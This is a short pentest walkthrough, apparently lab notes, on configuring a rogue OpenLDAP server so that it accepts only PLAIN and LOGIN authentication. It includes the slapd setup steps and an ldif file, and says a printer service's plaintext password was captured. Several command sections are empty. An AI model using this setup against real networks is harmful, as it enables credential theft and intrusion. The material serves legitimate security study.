Rogue LDAP Server
sudo apt install slapd ldap-utils
sudo systemctl enable slapdsudo dpkg-reconfigure -p low slapdOmit initial configuration?:
NoDNS domain name:
target domainOrganization name:
target domainAdministrator password:
anything, but remember itDatabase removed?:
NoMove old database?:
Yes
Backing up /etc/ldap/slapd.d in /var/backups/slapd-2.5.18+dfsg-3... done.
Moving old database directory to /var/backups
Creating initial configuration... done.
Creating LDAP directory... done.Before using the rogue LDAP server, we need to make it vulnerable by downgrading the supported authentication mechanisms. We want to ensure that our LDAP server only supports PLAIN and LOGIN authentication methods. To do this, we need to create a new ldif file, called with the following content:
cat ./olcSaslSecProps.ldif#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcredolcSaslSecProps: Specifies the SASL security properties
noanonymous: Disables mechanisms that support anonymous login
minssf: Specifies the minimum acceptable security strength with 0, meaning no protection.
Update configuration

Verify configuration

We have our LDAP server running under the 389 port.
Capturing LDAP Credentials



And we are able to retrieve the plain text password used for the Printer Service against LDAP.
Last updated